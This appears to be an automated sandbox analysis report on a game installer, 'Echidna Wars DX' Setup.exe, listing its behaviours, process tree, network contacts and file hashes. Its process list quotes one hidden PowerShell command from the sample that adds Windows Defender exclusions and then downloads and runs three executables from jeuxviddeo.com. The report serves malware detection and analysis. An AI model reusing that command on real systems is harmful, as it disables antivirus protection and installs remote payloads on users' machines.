Malware Analysis Report

2025-08-10 12:05

Sample ID 240222-y3ra9seg2s
Target Setup.exe
SHA256 0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29
Tags discovery
Score 7/10

Analysis Overview

Threat Level: Shows suspicious behavior

The file Setup.exe was found to show suspicious behavior.

Malicious Activity Summary

discovery

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Runs net.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-02-22 20:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-02-22 20:18
Reported 2024-02-22 20:21
Platform win10-20240221-en
Max time kernel 64s
Max time network 77s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Echidna Wars DX\Game.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Echidna Wars DX\Game.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Echidna Wars DX\Game.exe N/A
N/A N/A C:\Echidna Wars DX\Game.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3992 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp
PID 4100 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp C:\Windows\SysWOW64\cmd.exe
PID 4568 wrote to memory of 656 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 656 wrote to memory of 4456 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4568 wrote to memory of 4600 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""

C:\Windows\SysWOW64\net.exe

net session

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 session

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit

C:\Echidna Wars DX\Game.exe

"C:\Echidna Wars DX\Game.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f4

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 772

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 jeuxviddeo.com udp

Files

C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp

MD5 9665ccc8017eab35c9bea56ab727692a
SHA1 177a4d25e994e3a5e792360ce1ef48a25c9600e3
SHA256 dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c
SHA512 df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5

C:\Echidna Wars DX\Game.exe

MD5 5769be658b2478d3d437c152adec05cf
SHA1 9794744bd45a038641f219ecefd31fa2e239ebbd
SHA256 4df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e
SHA512 8491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e

C:\Echidna Wars DX\config.bat

MD5 62f9201f9ed75ebef04946bcdf72d95a
SHA1 5779fad609e0c77363e6436230954243c29c9205
SHA256 f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847
SHA512 ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qjmxpfe2.ck4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Echidna Wars DX\Game.exe

MD5 7de3741fb79dcfa8df54a4daa90c8692
SHA1 8003f910997a50719d55ff098f42a23d13598b08
SHA256 86b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b
SHA512 31f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c

C:\Echidna Wars DX\Game.exe

MD5 4e26e69b1622efa982a86cbe2edd5801
SHA1 8d75b18942f4ab79e29457d12d47cb7bb8763612
SHA256 4251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472
SHA512 2f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7

C:\Echidna Wars DX\ovplay.dll

MD5 def47290ed52d7ce0a2e65e8ffac95a2
SHA1 0edc4bb840d995a5d80f1cd15026e655c817a6ce
SHA256 558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc
SHA512 469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208

\Echidna Wars DX\hmm.dll

MD5 401a237f4e02457713382b2413a4800c
SHA1 fcddfc03d93011efb0e0910c456aa47f2e632057
SHA256 5eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565
SHA512 443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61

C:\Echidna Wars DX\hspda.dll

MD5 88735cdf603d77cceef556215e43a45f
SHA1 47a4d364015a3f17143978b32aeb35220c54cb0a
SHA256 0ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212
SHA512 06995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71

\Echidna Wars DX\hspogg.dll

MD5 8c44de023765b683fce13c7d17a00add
SHA1 b5256452df6f534057271a8cd1df817ce3a5bbe7
SHA256 02859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8
SHA512 ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2
